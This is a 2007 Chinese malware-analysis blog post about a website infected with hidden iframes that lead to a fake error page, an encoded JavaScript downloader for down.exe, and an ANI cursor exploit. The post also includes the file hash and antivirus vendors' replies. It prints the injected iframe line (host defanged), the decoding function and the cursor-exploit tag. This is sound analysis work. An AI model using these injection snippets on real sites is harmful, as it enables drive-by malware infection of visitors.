某VIP会员站被挂马 Trojan.Win32.Agent.vty/ down.exe

来源：互联网发布：java开源大全编辑：程序博客网时间：2024/04/28 06:46

某VIP会员站被挂马 down.exe

endurer 原创
2007-08-23 第2版补充瑞星和 Kaspersky 的回复
2007-08-23 第1版

有网友反映，他的电脑中的php文件里老是被写入＜iframe src=hxxp://down***.***onlinedowns.net/page**/image***/pd.htm height=0 ＞＜/iframe ＞代码。

打开 hxxp://down***.***onlinedowns.net/page**/image***/pd.htm，居然显示出错页：正在查找的网页可能已被删除、重命名或暂时不可用。

检查发现这是个伪造的出错页，其中包含代码：
/---
＜script language="Jscript.encode" src=css.js＞＜/script＞
＜iframe src=hxxp://down***.***onlinedowns.net/page**/image***//top2.htm width=0 height=0＞
---/

css.js 包含用 eval()执行的代码，经过3次解密后得到原始代码，其中使用了自定义解密函数：
/---
ｆｕｎｃｔｉｏｎＲｒＲｒＲｒＲｒ（ｔｅａａｂｂ）｛ｖａｒｔｔｔｍｍｍ＝"";ｌ＝ｔｅａａｂｂ～ｌｅｎｇｔｈ;ｗｗｗ＝ｈｈｈｈｆｆｆｆ＝Ｍａｔｈ～ｒｏｕｎｄ（ｌ／2）;ｉｆ（ｌ<2＊ｗｗｗ）ｈｈｈｈｆｆｆｆ＝ｈｈｈｈｆｆｆｆ－1;ｆｏｒ（ｉ＝0;ｉ<ｈｈｈｈｆｆｆｆ;ｉ＋＋）ｔｔｔｍｍｍ＝ｔｔｔｍｍｍ＋ｔｅａａｂｂ～ｃｈａｒＡｔ（ｉ）＋ｔｅａａｂｂ～ｃｈａｒＡｔ（ｉ＋ｈｈｈｈｆｆｆｆ）;ｉｆ（ｌ<2＊ｗｗｗ）ｔｔｔｍｍｍ＝ｔｔｔｍｍｍ＋ｔｅａａｂｂ～ｃｈａｒＡｔ（ｌ－1）;ｄｏｃｕｍｅｎｔ～ｗｒｉｔｅ（ｔｔｔｍｍｍ）;｝;
---/

整个代码实现功能是下载 down.exe，通过创建和执行 autoexebc.bat、system32.vbs 来启动 down.exe。

文件说明符 : D:/test/down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-8-20 12:31:57
修改时间 : 2007-8-20 12:31:49
访问时间 : 2007-8-20 12:35:30
大小 : 10689 字节 10.449 KB
MD5 : af2b974b3a49fb05eecab13759f163f5

hxxp://down***.***onlinedowns.net/page**/image***/top2.htm 显示的是：Service Unavailable，其中包含代码：
/---
＜DIV style="CURSOR: url('./top.jpg')"＞＜/DIV＞
---/

top.jpg 利用 ANI 漏洞下载 down.exe。

主　题：病毒上报邮件分析结果－流水单号:20070823124121723506 发件人： "" <send@rising.net.cn> 发送时间：2007.08.23 13:02

尊敬的客户，您好！
    您的邮件已经收到，感谢您对瑞星的支持。

    我们已经详细分析过您的问题和文件，以下是您上传的文件的分析结果：
    1.文件名：down.exe
    病毒名：Trojan.Win32.Agent.vty

    您所上报的病毒文件将在19.37.32版本中处理解决。

主　题： RE: down.exe [KLAB-2759327] 发件人： "" <newvirus@kaspersky.com> 发送时间：2007.08.23 17:11

Hello.
New malicious software was found in the attached file.
Trojan-Downloader.Win32.Small.ege
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Roman Gavrilchenko
Virus Analyst, Kaspersky Lab.